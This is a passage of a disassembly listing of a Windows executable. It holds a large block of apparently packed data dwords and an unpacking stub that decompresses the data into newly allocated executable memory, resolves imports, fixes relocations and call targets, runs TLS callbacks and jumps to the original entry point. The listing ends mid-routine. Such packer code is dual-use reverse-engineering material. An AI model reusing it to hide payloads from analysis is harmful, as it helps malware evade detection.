dd 72C373Dh, 71DB44DAh, 0BF68159Ah, 0A2D4A000h, 16DF304Ch
dd 6CC7F2E6h, 9293FC4Dh, 0C3C46464h, 141D3971h, 8DA68A08h
dd 0CB5719C8h, 27EBE4CBh, 654FB921h, 87220CE3h, 0AC0478ABh
dd 594E0598h, 4778D819h, 0CDAFA371h, 3058065h, 19FDE804h
dd 6A7578FBh, 5B398E47h, 8E891729h, 0FE587680h, 84B8E25Ch
dd 4D2390C5h, 0D45E0102h, 4C2721A8h, 0B80DAD6Dh, 38B21D69h
dd 0C613C236h, 96D9FE50h, 0CD6E2355h, 0A8F0BC08h, 0CEC03288h
dd 7036AADAh, 220CA8B8h, 0A3E8046Fh, 20FB31A3h, 143AE968h
dd 1B00DC8h, 3BA02936h, 58207FF6h, 0C87B04E4h, 697C6E1Dh
dd 37A59227h, 63DDF645h, 1EBE14Fh, 94CB76DFh, 802E1D43h
dd 902DBFCCh, 95C8535Eh, 0B6B628E3h, 0C04A267Ch, 2E30FC19h
dd 405149DEh, 0EAD2430Dh, 0BFC78EEEh, 560363B1h, 0A92214F8h
dd 0A1798609h, 5D5BC5C4h, 1CEA1462h, 696C8D81h, 7AB1180h
dd 614904A6h, 88FE3E90h, 0BFF5AEE9h, 0B2201550h, 0CA4684B7h
dd 32F1E68Ah, 2ED8094Fh, 75E5BD03h, 0CE108282h, 7F95E7A0h
dd 5C6E1DE5h, 0FACCE5A5h, 0E3F15366h, 0AEB744C8h, 2E9CCC30h
dd 0C95A6317h, 0C5D9B2C5h, 0DF35099Bh, 0ACAD01E4h, 0AEC30AB8h
dd 9A6F0276h, 0A892309h, 842226AAh, 3D405553h, 138E8C70h
dd 25CC5A3Fh, 0B7656A3Ah, 843E30B5h, 4434E652h, 18C98251h
dd 26E229FAh, 0E90BA678h, 5E9183DBh, 6BB79231h, 0F348F237h
dd 0F0D34ABh, 8E1CED4h, 250120EAh, 28DC4247h, 25A83B24h
dd 0CEBDE102h, 0E14D8F13h, 0BC4F7A0Ah, 0D9E4B71Bh, 4D7D3892h
dd 0DB78DE84h, 8CE9A2FBh, 36AA4B7Fh, 0DE40B07h, 6192AB80h
dd 77D9401Fh, 0FE9A6734h, 0DC723F69h, 47FF6EBEh, 26BE261Bh
dd 0DD982BEBh, 524C44F2h, 0CC3B726Ch, 441847A0h, 0C6A09E73h
dd 28CD4E8Fh, 8A39CA3Fh, 0D2B1F111h, 0BFE7C764h, 0D582CE5Ah
dd 0ABEA1678h, 0A9EF3AE8h, 0B45B34CEh, 0C6FF3100h, 4C6E7212h
dd 0ECFBC99Ah, 0F8D5C83Dh, 0FC877903h, 272D31C0h, 7CC3FCBEh
dd 96E52DCAh, 876AC913h, 0D5E07528h, 0EF485569h, 0AD139F4Fh
dd 32A94488h, 3E8B82F2h, 0E59394BFh, 1F30261Ch, 0E33CF8AFh
dd 0A7A781E6h, 87830F64h, 73E02F04h, 34A9F960h, 20B25C88h
dd 40167C15h, 2B39A04Dh, 3380C848h, 4C2CDAD5h, 6B3706C8h
dd 95353EF0h, 3155DC75h, 0D025B70Ch, 73E66DBh, 9AFD172Dh
dd 0D3E82CFBh, 6C8F0545h, 0B89053E0h, 568A45DCh, 0B46E0D5Bh
dd 7F5D195Bh, 0CD079683h, 7797AB29h, 81E8B5E2h, 0EE628CA1h
dd 0E508355h, 316C81F1h, 0D0FBA15Ah, 0F9AC8460h, 277F26EEh
dd 96EC00EAh, 99B4AE38h, 1AC582E4h, 0EA5B35E1h, 0B7C4E801h
dd 0BEFF6B61h, 2BA25114h, 0AE866ECFh, 30DB298Bh, 2F449D19h
dd 0A342E767h, 0DAB8CF4h, 545E56D8h, 990A9A57h, 0BBE9867Ch
dd 0F8F92E8Ch, 16D5C9B2h, 0AD55B373h, 4AC32DECh, 0CCA80B23h
dd 0E31B7F9Ch, 53DCB907h, 0E71747A1h, 79336CA2h, 0E477C8CAh
dd 58368F22h, 20A68533h, 3117F541h, 1EC62F53h, 96845E43h
dd 2A01F89Eh, 707E274Ch, 9C17346Ah, 64EFEC81h, 0D46D0722h
dd 83F1DBCCh, 0D96EDF24h, 0AB0F0D9Ah, 6B3A84B9h, 775073D9h
dd 0AC1EC0FFh, 2E84DFC9h, 0AD8E6459h, 1D60AD0Eh, 50FB8A58h
dd 23F191FFh, 0E229B4E5h, 0CD5F4C54h, 7287C33Eh, 0C52F9ED7h
dd 0C8926698h, 7F78B3BBh, 6612A8E6h, 68261307h, 81C9F18Ch
dd 9BA7AD94h, 0B94C1CCCh, 5A1BB0DEh, 32C1D92Fh, 0EF48408Fh
dd 0A5846E3Fh, 64B0038h
dd 0E9E91EABh, 0AC043CE1h, 0C364414Ch, 0AD4D024Eh, 6D76D23Bh
dd 26D52ECDh, 9C83079Bh, 0B98522E9h, 0C88FA847h, 0EDE18C1h
dd 843969D3h, 0A014FCF5h, 569EA097h, 0CE70D43Fh, 14184D16h
dd 0D2A1CA09h, 0AB4874A4h, 7AD168Dh, 62B794D0h, 0CF2D72A2h
dd 73392228h, 1F65DA00h, 0D4268947h, 0AC8EFA4Eh, 0C392D43Eh
dd 1F62BE33h, 9FE246ABh, 8A11AACBh, 75628E2Dh, 9409F65Bh
dd 1DE869A7h, 9FFFDCBBh, 0D5601E9Eh, 0BD0F7024h, 3DD6734h
dd 0F543487Dh, 5DB8C602h, 508580Ah, 12A1CD68h, 0F731C993h
dd 0D5A522Eh, 1B50D7D0h, 2152D79h, 0F8DAAEC2h, 18C595C6h
dd 0C50CCA5Bh, 1296CAF3h, 0EECEDAE2h, 0EC1AACFBh, 5655A9C4h
dd 12D72C60h, 4357BBEFh, 81192154h, 47B0D7Eh, 0B91A3668h
dd 0F0FF31E2h, 9129AE8Bh, 7D5CC493h, 48F3C232h, 5467B1A2h
dd 6620E03Fh, 2FBA5958h, 7A4527AFh, 0FDBA574Eh, 0FE492030h
dd 710D9EE7h, 0B27697E3h, 8D70DCh, 5E8B5A96h, 0FA566F71h
dd 0D4D53863h, 56B24C27h, 0B44914E6h, 82C4BFD5h, 8C859956h
dd 2D8E3251h, 695B474Ah, 0E5B8613Fh, 35CA53C4h, 4306C380h
dd 64016414h, 6E8F3A9Ah, 1031A97Ch, 0F001EEFAh, 1CAB3BE1h
dd 0A020C765h, 0F56CA686h, 0FAF4A7C3h, 7B2B58F4h, 71F0013h
dd 393954h, 67FBF423h, 3F423D36h, 1D12E626h, 0F1177353h
dd 0D4EF96D1h, 8827B434h, 965241A0h, 56D2384h, 5485D187h
dd 41053F10h, 0C82C44D3h, 0B4A6CE0Eh, 7D164629h, 6B3EC387h
dd 3B451B0Dh, 81590EC1h, 8F0B69AFh, 1493AC38h, 999642F4h
dd 0DD279FCDh, 0C84D6CD7h, 55C8DBE6h, 0F7815FFh, 6248217Bh
dd 17E6B1C2h, 0B74A445Eh, 0F13A2900h, 0B8235D6Bh, 0C720BB45h
dd 4EAA2135h, 9F818249h, 7764C2D4h, 0DADCD09Eh, 0A68C7B43h
dd 419011ACh, 7253A99Dh, 428936EDh, 96B04FD6h, 3E2AF7CCh
dd 0D5F6940Ah, 0BCFDCD1Ch, 7662C03Bh, 181B82Eh, 0F1930444h
dd 0C2A46B1Fh, 0B1BAE6B0h, 0EE600188h, 3EBCB57Ch, 7FE14C68h
dd 0E84D9AE4h, 6C293024h, 72B615EAh, 0A069C95Ch, 0EB767166h
dd 7C6C78B1h, 2581EC0Ah, 981AD970h, 40430DB1h, 37364CD4h
dd 3DE36C22h, 4F059EAAh, 1F3B121Ch, 0DF7DA8E5h, 0D954A02h
dd 0C23308E2h, 0C6910C3Ch, 0DA199B66h, 757FCDCFh, 2363AA49h
dd 0E4A4F33Eh, 0ACD9700Fh, 0CF61284Bh, 6F3A25CDh, 14E34579h
dd 0C61CB65Ch, 5521D3DAh, 0A6374C4Ch, 0DFC8F9F9h, 62B3BB9Dh
dd 7A9B625Bh, 3E47D8F4h, 0A553089Eh, 0F40AE939h, 879B5F6Fh
dd 0BF8407C8h, 991A76CDh, 89E02EAFh, 64C9D6E6h, 11964Eh
dd 11B44F5Ch, 6EE092FEh, 4B3B0E7h, 32DCAA8h, 0DC547D25h
dd 50B12364h, 0C4A6C9EFh, 0C69E889Bh, 0BB67375Ah, 9537C592h
dd 43F0DE99h, 0B1B72C28h, 0D6B7E64h, 18DC4A90h, 5B553EB2h
dd 1D2ED722h, 0C2AF38F4h, 301B959Ch, 6D536E6Bh, 2676733Fh
dd 9A29C8FEh, 772719ADh, 26F893Eh, 45837CB1h, 7D360C24h
dd 7A984DD4h, 0B165015Bh, 580D2B35h, 0F824098Fh, 71FF6052h
dd 0DDFDA6EEh, 0F95915D8h, 3C1B356Ah, 0D8DB6288h, 0BEB7840h
dd 13E350E4h, 5594555Eh, 0CEFF7A07h, 6390E74Bh, 99A9E5B5h
dd 0ED3D52CBh, 6D210DB4h, 0B69C7F3Eh, 51FD8F65h, 0A63017C8h
dd 8D173665h, 0E52602B7h, 5CEE54E0h, 1BC48637h, 0B341E145h
dd 1CFAA96Bh, 0D4C1429h, 379B46B4h, 8793A29Bh, 2AD73BE5h
dd 0CC15EBE3h, 0F5B8A7FBh, 0A6C1DA33h, 0DE38F2B1h, 4F6B61C2h
dd 6E4D20D9h, 813AA225h, 43CD39BFh, 10E3CF97h, 5D960D23h
dd 37D875A1h, 605DB0F8h, 4B5F0F25h, 1C403CC2h, 4BD69514h
dd 989A98E7h, 41BB0D5Dh, 0D8DA2B5Ah, 0A1B5A3Ah, 9A540A9Eh
dd 0E0BEC3A6h, 0B67C9488h, 0ADE7653Fh, 914C156h, 5F3EB4B9h
dd 0C6271222h, 8B54882Fh, 0A02656D9h, 37B28DAEh, 0D1218224h
dd 5A20671Eh, 30D957EBh, 9D6CBC62h, 0FFAEA5Bh, 584A7D41h
dd 9473A584h, 5055FAB7h, 3481573Eh, 7EB66E9Dh, 72BD3425h
dd 4177A480h, 3D9AEF44h, 0A68884C0h, 0F11A4F97h, 2BE179C2h
dd 0B2A8D42Fh, 0B452AA13h, 452B0BA9h, 2A72F515h, 26B0C797h
dd 9E1E7ACAh, 0FBA758F9h, 34D78713h, 0AEE26E18h, 69C814B7h
dd 0B62BB3BCh, 0C601FE37h, 0A39AF69Ch, 41F05F3Bh, 2F993193h
dd 0E439358Ah, 3BCDD6BDh, 1F3C9CD8h, 83324959h, 1355358Ch
dd 655C66D8h, 5F51035Ah, 50960A64h, 809F3727h, 40D5CCC4h
dd 0E3B2B546h, 8D080DFDh, 44991E57h, 0D624CC4Ch, 2323A43Ah
dd 1FE39C08h, 3326A78h, 2741D1E5h, 0BAEF9ED6h, 0BE144126h
dd 0A91F8A8Ch, 0C4C5ACB6h, 4536A014h, 38CC712h, 0C60D3FB3h
dd 731E0BF9h, 53AB20C0h, 0F287F53Eh, 0C610C083h, 0FF0E500Fh
dd 6CEE5498h, 7F6DAEA5h, 39B2FC8Dh, 815B16B4h, 5F61D324h
dd 6E20D833h, 906AE843h, 7BBC3646h, 0AD394D10h, 0EEA0FEC1h
dd 76EFFB44h, 0F427355Ch, 0ED8E1D58h, 5DBA8730h, 3E17A342h
dd 0C27A60ECh, 0F4981741h, 6A7ED382h, 844015EBh, 4C7DFBA9h
dd 9C7FEB7Dh, 0EC7C7893h, 231EDB4Dh, 98986191h, 0D9BD7818h
dd 98AE4D4Ch, 8BD6C2CFh, 29F59E75h, 360FEF14h, 0EAE1A61Ah
dd 0B6AAB421h, 40550B8Eh, 0BA69FA9Bh, 0E533E5A7h, 0C44C3991h
dd 8EA6CBDDh, 89F63F15h, 0CE8D38D0h, 0BF9A5F13h, 0EBD2E621h
dd 9E2A01B6h, 5C30B065h, 0E2DF995Dh, 6540569Eh, 0DC1A05Ch
dd 8D4D4ED1h, 748C9C2Ah, 5CB649E3h, 43CA7AE6h, 50F3777Dh
dd 606D5172h, 1B9F2269h, 8FC8BE04h, 41ACFF9h, 0D458EB42h
dd 0C9820B88h, 56A509E6h, 53DA824Fh, 0F4FA2F70h, 0A360BF6h
dd 0F6381A69h, 4FFFF8CAh, 2BB2B3D2h, 0B5F235AFh, 2DCEFA1Ch
dd 0FAC150FEh, 0F8AAA2CAh, 2B6B09F7h, 3D3EC38Ch, 34796A4Dh
dd 0DC9B1302h, 0EC79DFC5h, 0D3EA2E2Ah, 2B3EACEAh, 0F7E8B948h
dd 63CB0E6h, 769F3322h, 0F5C613DCh, 0C6F342A9h, 265C20B6h
dd 6D0295C7h, 3180D5CCh, 0BE71D84Eh, 0B336C2AFh, 59FB008Ch
dd 9AF8252Ch, 8C59FE70h, 95A5E1B8h, 804AD378h, 0D0CA95C3h
dd 64B6A21Dh, 2CB35983h, 0F9CAB0B0h, 283582D1h, 0F51A3531h
dd 24B3B22Bh, 6489C273h, 43AD6B20h, 0BC6F9579h, 101EB868h
dd 1E659E29h, 0EB1841A2h, 4251AE5Dh, 59F9558h, 98567450h
dd 44A47B2Ch, 0DB756BF9h, 0FC535413h, 8772BE9Dh, 4BAE90EAh
dd 0EC3A85FBh, 9215D334h, 0B778909Ch, 3D10776Eh, 6E823561h
dd 0F50EF22Ch, 21C885D0h, 0BFCE239Dh, 0B5E23C20h, 981CDAE1h
dd 7C4F153Fh, 0D79402C1h, 7143197Bh, 3F3A06EEh, 53B55C2Bh
dd 5AFF5968h, 2572287Eh, 0E1E2E590h, 0DAD175CBh, 961504F8h
dd 3AB0C64Ch, 617EF3E7h, 0D39F6C48h, 6779162Ch, 0DDCC604Eh
dd 34AFFB3Dh, 2706F6A0h, 52CBB591h, 0B6DF3087h, 9E3D713Eh
dd 2C13A819h, 0CCC2ACE3h, 8662CF21h, 0B4F460F5h, 0B7BAFD0Dh
dd 23141F5Dh, 13BA5806h, 0E0C900F9h, 0A0A89D1Ah, 0B7E9E1A4h
dd 0DF073D5Ch, 0D892D4BDh, 0D2D8CEB6h, 6726ECFFh, 6DB7435Ah
dd 720B3D8h, 0C3375D83h, 0F9680FA6h, 0A5597C95h, 7B03B47Eh
dd 1D117D9Bh, 90AA1BB2h, 0B426E7Bh, 0AB7E27C5h, 7525278Bh
dd 45B3347Ch, 19D0399Bh, 0B746FCCCh, 9DFF235Ah, 0C782620h
dd 0C25C531Bh, 0D5A8A169h, 7768013Bh, 3A2EDA1Fh, 0CA9C10F9h
dd 21B5FDD2h, 0AF892202h, 0A09A728h, 0CE82A8E3h, 0C2961A5Ch
dd 3A562268h, 22361976h, 0B910E2D1h, 9B76B348h, 9922AFE4h
dd 13C92A62h, 9929B7F8h
dd 20F25F99h, 5D5CF30h, 82E237B6h, 261CEAF7h, 0DE82EBDFh
dd 0F6ADA3Ah, 6F8366FFh, 5AA3368Fh, 565C47F7h, 0FB575EDAh
dd 0F786523Ah, 0CBDD780Bh, 0F791F9A9h, 0BA6E09EFh, 19DDAACh
dd 0C203F8Ch, 4BC880D5h, 7CA00A26h, 23BB2AB5h, 10D7BE1Ch
dd 7C418C2Dh, 0BD3FA83Eh, 0C79FE919h, 0A531E170h, 780D63E6h
dd 6208F052h, 0F14BFBDFh, 72F72C38h, 78A5644Bh, 4A4AEA8Ah
dd 0F56AD163h, 0D0DABF61h, 303250A3h, 0C45CED96h, 0E60DE297h
dd 0D827890Ch, 0BCDDD4C4h, 0D6A9FDC7h, 74EFB0BEh, 0CDE1E972h
dd 8D34B9C6h, 5AA2A178h, 0D0E5BF37h, 6BADF2D4h, 0C04BA785h
dd 1A2C6B20h, 0DBDD65C9h, 61E53AB2h, 7D2ECA5Fh, 9BEC7505h
dd 3643A70Dh, 0F201F60Dh, 85797C3Fh, 20A078C8h, 7C43C6F5h
dd 4DDDE3E0h, 0F523D057h, 13CA51E6h, 0FA104AC0h, 0C495E8AFh
dd 20D82418h, 872411EDh, 67B8E69Ch, 0B8016ADAh, 2269C954h
dd 3326EEF3h, 97DB759h, 0B781907Fh, 63CC60E4h, 0A8F8F3E1h
dd 33C93C40h, 0A249B8CAh, 8BB1B1A8h, 313B83CBh, 6BFD0E37h
dd 0CFEA671Eh, 0A0EE4042h, 2D8DDD56h, 1FD13BEh, 605F7E23h
dd 0D4F1CF97h, 0E4CE19Ch, 0FDDE328Bh, 1EE54B2Eh, 0C60F43DFh
dd 0F0A309D6h, 0BC2BF2FCh, 365E96A9h, 31662258h, 9504C938h
dd 74A0EEBFh, 55F86E57h, 0B107C433h, 0D9AB0897h, 0F2E02134h
dd 509DC0A5h, 71346564h, 0A7F57895h, 7934D6B0h, 6A507BB4h
dd 0F209DFE7h, 95D42C6Dh, 2B38EAA6h, 1B8844BFh, 0B027AED0h
dd 0E6E714E2h, 0BF20D777h, 1C3083B6h, 927D9DF6h, 68032B5Ch
dd 7B0D4276h, 885628DDh, 8479F1C7h, 62D66095h, 956EA6B7h
dd 0AE24A491h, 0BF586D0Fh, 1D783DF1h, 67B8D266h, 0B4A2568Fh
dd 0EF29BF2Ch, 0BE73ECC1h, 0EB406E1Ah, 44C1D868h, 0E7FB1397h
dd 3EC82E14h, 74EA8034h, 0E5F565DDh, 5B94ECDDh, 2834F8BBh
dd 5D74AB97h, 0DCEECEBh, 2C756193h, 3ECFD572h, 4781CB7Eh
dd 9291288h, 8B03C667h, 7FE64B25h, 1D3E1960h, 0AF360CD8h
dd 26F508ADh, 904B1194h, 3FF6B36Dh, 0E2D60F06h, 86702A89h
dd 0F97F3352h, 6C7C4F7Ah, 25718BF7h, 381935A1h, 4B7240B7h
dd 28772728h, 3D3E7E47h, 0A41062DAh, 451A564Dh, 45094494h
dd 4CAD4971h, 1E851BCCh, 51A0300Ch, 7B836E22h, 46539872h
dd 5BADCB4Eh, 0C9B76D57h, 82DE8762h, 716C1E36h, 7F42AFDh
dd 0F4FA2013h, 6ED6EA90h, 7677F7B1h, 0F0AB70CAh, 4A27AFEDh
dd 87C5F680h, 0B21761A9h, 92C2326Fh, 0E938C9F5h, 0B35EFD2Ch
dd 12EDBA5h, 7EE8DEBFh, 0EC80692h, 9C3BEBD0h, 324C4A0Fh
dd 0B6F8447h, 0DAD2D5CBh, 8ED8B3B0h, 862F050h, 53095A71h
dd 165DD791h, 4A6340A4h, 73048EC1h, 0F7B898F7h, 0BEEE7054h
dd 7A427817h, 0AF629BC2h, 0FB647A4Bh, 3B84CA5Bh, 6C82379Fh
dd 10AE1CD7h, 87748594h, 7FE11BBCh, 0BA29A1E2h, 0C1899862h
dd 0EFECC0BEh, 38D46h, 81C9956Dh, 0CF36D042h, 904C886Ah
dd 2D60C715h, 9FFCB69Ch, 0B1CA7377h, 4E75C6A0h, 19B89414h
dd 76598ADAh, 9191008Bh, 279AE8A4h, 0D3CAF86Eh, 6A9743ABh
dd 0AFB095D1h, 94DDD278h, 0DFA4CB76h, 0E0B87F2Dh, 2E11BA1Fh
dd 0E570D538h, 86806141h, 3A6A3212h, 19D2838Fh, 0B1EDB37Ch
dd 21E9A563h, 8957C5B3h, 2A9D873Ch, 54F592BAh, 26E1E9BCh
dd 0ACD8E0A6h, 4F4E6037h, 514D5715h, 0D5AD84B1h, 0E43F25D7h
dd 7875F4Fh, 8CF6B91Ch, 0ED1D1EFFh, 0B88293ABh, 999C2CA7h
dd 50DB16EDh, 19796F41h, 8C8F8D1Ch, 0E1059A25h, 10CA93E0h
dd 0F829097Ch, 4ADA7EA5h, 1756940h, 0B3F8BC1Bh, 17F7D70h
dd 0FADD398Ch, 0D88B7AECh, 8CEE22EFh, 45C42723h, 34D96FFh
dd 78h, 9A790000h, 2C41E61Bh, 507DD4FDh, 0F472984h, 650ADC31h
dd 4AFE909Bh, 0D3534313h, 73A394EEh, 0BAFA078Ch, 1E59C061h
dd 6FDE28E0h, 62C4164Ah, 0B6029890h, 8A2887A7h, 80A54961h
dd 70F15AC1h, 0A9EEF089h, 64068A46h, 4A6FF7Fh, 0
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start_0
loc_42CADA: ; CODE XREF: start_0+5�j
pusha
call $+5
mov ebp, [esp+0]
add esp, 4
cmp dword ptr [esp+28h], 1
jnz short loc_42CAF9
mov eax, [esp+24h]
mov [ebp+0CE0h], eax
jmp short loc_42CB05
; ---------------------------------------------------------------------------
loc_42CAF9: ; CODE XREF: start_0-5231�j
mov eax, [ebp+0CDCh]
mov [ebp+0CE0h], eax
loc_42CB05: ; CODE XREF: start_0-5225�j
call sub_42CC91
lea esi, [ebp+0D08h]
lea ebx, [ebp+4C6h]
xor edi, edi
push 40h
push 1000h
push 0C2000h
push 0
call dword ptr [ebp+0C71h]
mov [ebp+0CD8h], eax
call sub_42CCCF
jmp short loc_42CB59
; ---------------------------------------------------------------------------
loc_42CB39: ; CODE XREF: start_0-51BF�j
pusha
mov eax, [ebp+0CE0h]
push dword ptr [ebp+0CD8h]
push dword ptr [edi+esi]
add [esp+0], eax
push dword ptr [edi+esi+4]
add [esp+0], eax
call ebx
popa
add edi, 8
loc_42CB59: ; CODE XREF: start_0-51E5�j
cmp dword ptr [edi+esi], 0
jnz short loc_42CB39
cmp dword ptr [ebp+0CECh], 0
jz short loc_42CB76
cmp dword ptr [ebp+0CF0h], 0
jz short loc_42CB76
call sub_42CDA7
loc_42CB76: ; CODE XREF: start_0-51B6�j
; start_0-51AD�j
lea esi, [edi+esi+4]
push ebx
push 40h
push 1000h
push 2E1h
push 0
call dword ptr [ebp+0C71h]
mov [ebp+0D04h], eax
pop ebx
pusha
push dword ptr [ebp+0CD8h]
push esi
push dword ptr [ebp+0D04h]
call ebx
popa
mov esi, [ebp+0D04h]
mov eax, esi
jmp short loc_42CBB2
; ---------------------------------------------------------------------------
loc_42CBB1: ; CODE XREF: start_0-5167�j
inc eax
loc_42CBB2: ; CODE XREF: start_0-516D�j
cmp byte ptr [eax], 1
jnz short loc_42CBB1
inc eax
mov edi, [eax]
add edi, [ebp+0CE0h]
add eax, 4
mov [ebp+0D00h], eax
jmp short loc_42CC3D
; ---------------------------------------------------------------------------
loc_42CBCB: ; CODE XREF: start_0-50DC�j
push esi
call dword ptr [ebp+0C69h]
or eax, eax
jnz short loc_42CBDB
call sub_42CF00
loc_42CBDB: ; CODE XREF: start_0-5148�j
test eax, eax
jz loc_42CC8F
mov [ebp+0CFCh], eax
mov eax, esi
jmp short loc_42CC1B
; ---------------------------------------------------------------------------
loc_42CBED: ; CODE XREF: start_0-50FE�j
mov eax, [ebp+0D00h]
mov eax, [eax]
push eax
push dword ptr [ebp+0CFCh]
call sub_42CE6E
test eax, eax
jz loc_42CC8F
mov [edi], eax
add dword ptr [ebp+0D00h], 4
add edi, 4
mov eax, [ebp+0D00h]
loc_42CC1B: ; CODE XREF: start_0-5131�j
cmp dword ptr [eax], 0
jnz short loc_42CBED
jmp short loc_42CC23
; ---------------------------------------------------------------------------
loc_42CC22: ; CODE XREF: start_0-50F6�j
inc esi
loc_42CC23: ; CODE XREF: start_0-50FC�j
cmp byte ptr [esi], 0
jnz short loc_42CC22
inc esi
add eax, 4
mov edi, [eax]
add edi, [ebp+0CE0h]
add eax, 4
mov [ebp+0D00h], eax
loc_42CC3D: ; CODE XREF: start_0-5153�j
cmp byte ptr [esi], 1
jnz short loc_42CBCB
push 4000h
push 2E1h
push dword ptr [ebp+0D04h]
call dword ptr [ebp+0C75h]
push 8000h
push 0
push dword ptr [ebp+0D04h]
call dword ptr [ebp+0C75h]
push 8000h
push 0
push dword ptr [ebp+0CD8h]
call dword ptr [ebp+0C75h]
call sub_42CD23
call sub_42CE23
popa
jmp loc_420001
; END OF FUNCTION CHUNK FOR start_0
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start_0
loc_42CC8F: ; CODE XREF: start_0-513F�j
; start_0-5119�j
popa
retn
; END OF FUNCTION CHUNK FOR start_0
; =============== S U B R O U T I N E =======================================
sub_42CC91 proc near ; CODE XREF: start_0:loc_42CB05�p
pusha
mov eax, [ebp+0CE0h]
add eax, [eax+3Ch]
mov eax, [eax+80h]
add eax, [ebp+0CE0h]
mov eax, [eax+10h]
add eax, [ebp+0CE0h]
mov ecx, 5
lea esi, [ebp+0C69h]
jmp short loc_42CCC8
; ---------------------------------------------------------------------------
loc_42CCBD: ; CODE XREF: sub_42CC91+3A�j
mov ebx, [eax]
mov [esi], ebx
add esi, 4
add eax, 4
dec ecx
loc_42CCC8: ; CODE XREF: sub_42CC91+2A�j
cmp ecx, 0
ja short loc_42CCBD
popa
retn
sub_42CC91 endp
; =============== S U B R O U T I N E =======================================
sub_42CCCF proc near ; CODE XREF: start_0-51EA�p
pusha
lea eax, [ebp+0CD4h]
push eax
push 40h
push 200h
push dword ptr [ebp+0CE0h]
call dword ptr [ebp+0C79h]
mov dword ptr [ebp+0CD4h], 2040001h
mov eax, [ebp+0CE0h]
add eax, [eax+3Ch]
add ax, [eax+14h]
add eax, 18h
mov ebx, [eax+0Ch]
add ebx, [ebp+0CE0h]
mov ecx, [eax+8]
lea eax, [ebp+0CD4h]
push eax
push 40h
push ecx
push ebx
call dword ptr [ebp+0C79h]
popa
retn
sub_42CCCF endp
; =============== S U B R O U T I N E =======================================
sub_42CD23 proc near ; CODE XREF: start_0-509E�p
var_24 = dword ptr -24h
pusha
mov esi, [ebp+0CE4h]
or esi, esi
jz short loc_42CDA5
mov edi, [ebp+0CDCh]
mov eax, [ebp+0CE0h]
cmp eax, edi
jz short loc_42CDA5
add esi, eax
jmp short loc_42CDA0
; ---------------------------------------------------------------------------
loc_42CD42: ; CODE XREF: sub_42CD23+80�j
mov edx, [esi]
mov eax, [esi+4]
mov [ebp+0CE8h], eax
add [ebp+0CE8h], esi
mov ebx, [ebp+0CE0h]
xor ecx, ecx
add esi, 8
jmp short loc_42CD98
; ---------------------------------------------------------------------------
loc_42CD60: ; CODE XREF: sub_42CD23+7B�j
movzx eax, byte ptr [esi]
cmp al, 0E0h
jnb short loc_42CD7B
push eax
add eax, edx
add eax, ebx
add eax, ecx
add ecx, [esp+24h+var_24]
add esp, 4
sub [eax], edi
add [eax], ebx
inc esi
jmp short loc_42CD98
; ---------------------------------------------------------------------------
loc_42CD7B: ; CODE XREF: sub_42CD23+42�j
movzx eax, word ptr [esi]
xchg al, ah
sub ax, 0E000h
push eax
add eax, edx
add eax, ebx
add eax, ecx
add ecx, [esp+24h+var_24]
add esp, 4
sub [eax], edi
add [eax], ebx
add esi, 2
loc_42CD98: ; CODE XREF: sub_42CD23+3B�j
; sub_42CD23+56�j
cmp esi, [ebp+0CE8h]
jb short loc_42CD60
loc_42CDA0: ; CODE XREF: sub_42CD23+1D�j
cmp dword ptr [esi], 0
jnz short loc_42CD42
loc_42CDA5: ; CODE XREF: sub_42CD23+9�j
; sub_42CD23+19�j
popa
retn
sub_42CD23 endp
; =============== S U B R O U T I N E =======================================
sub_42CDA7 proc near ; CODE XREF: start_0-51AB�p
pusha
mov esi, [ebp+0CECh]
add esi, [ebp+0CE0h]
mov edi, esi
mov ecx, [ebp+0CF0h]
cmp dword ptr [ebp+0CF4h], 0
jz short loc_42CDF9
jmp short loc_42CDF2
; ---------------------------------------------------------------------------
loc_42CDC7: ; CODE XREF: sub_42CDA7+4E�j
cmp byte ptr [esi], 0E8h
jz short loc_42CDD1
cmp byte ptr [esi], 0E9h
jnz short loc_42CDF0
loc_42CDD1: ; CODE XREF: sub_42CDA7+23�j
mov eax, [esi+1]
cmp al, [ebp+0CF4h]
jnz short loc_42CDEA
mov al, 0
bswap eax
sub eax, 5
add eax, edi
sub eax, esi
mov [esi+1], eax
loc_42CDEA: ; CODE XREF: sub_42CDA7+33�j
add esi, 4
sub ecx, 4
loc_42CDF0: ; CODE XREF: sub_42CDA7+28�j
inc esi
dec ecx
loc_42CDF2: ; CODE XREF: sub_42CDA7+1E�j
cmp ecx, 0
ja short loc_42CDC7
jmp short loc_42CE21
; ---------------------------------------------------------------------------
loc_42CDF9: ; CODE XREF: sub_42CDA7+1C�j
cdq
jmp short loc_42CE1C
; ---------------------------------------------------------------------------
loc_42CDFC: ; CODE XREF: sub_42CDA7+78�j
inc edx
cmp byte ptr [esi], 0E8h
jz short loc_42CE07
cmp byte ptr [esi], 0E9h
jnz short loc_42CE1A
loc_42CE07: ; CODE XREF: sub_42CDA7+59�j
mov eax, [esi+1]
bswap eax
sub eax, edx
mov [esi+1], eax
add esi, 4
add edx, 4
sub ecx, 4
loc_42CE1A: ; CODE XREF: sub_42CDA7+5E�j
inc esi
dec ecx
loc_42CE1C: ; CODE XREF: sub_42CDA7+53�j
cmp ecx, 0
ja short loc_42CDFC
loc_42CE21: ; CODE XREF: sub_42CDA7+50�j
popa
retn
sub_42CDA7 endp
; =============== S U B R O U T I N E =======================================
sub_42CE23 proc near ; CODE XREF: start_0-5099�p
pusha
mov esi, [ebp+0CE4h]
mov esi, [ebp+0CE0h]
add esi, [esi+3Ch]
mov esi, [esi+0C0h]
or esi, esi
jz short loc_42CE6C
add esi, [ebp+0CE0h]
add esi, 0Ch
mov esi, [esi]
or esi, esi
jz short loc_42CE6C
mov eax, [esi]
jmp short loc_42CE68
; ---------------------------------------------------------------------------
loc_42CE50: ; CODE XREF: sub_42CE23+47�j
push esi
cmp dword ptr [eax], 0
jz short loc_42CE62
push 0
push 1
push dword ptr [ebp+0CE0h]
call eax
loc_42CE62: ; CODE XREF: sub_42CE23+31�j
pop esi
add esi, 4
mov eax, [esi]
loc_42CE68: ; CODE XREF: sub_42CE23+2B�j
or eax, eax
jnz short loc_42CE50
loc_42CE6C: ; CODE XREF: sub_42CE23+18�j
; sub_42CE23+27�j
popa
retn
sub_42CE23 endp
; =============== S U B R O U T I N E =======================================
sub_42CE6E proc near ; CODE XREF: start_0-5120�p
; sub_42CF00+14�p
var_4 = dword ptr -4
arg_0 = byte ptr 4
lea eax, [esp+arg_0]
pusha
mov esi, eax
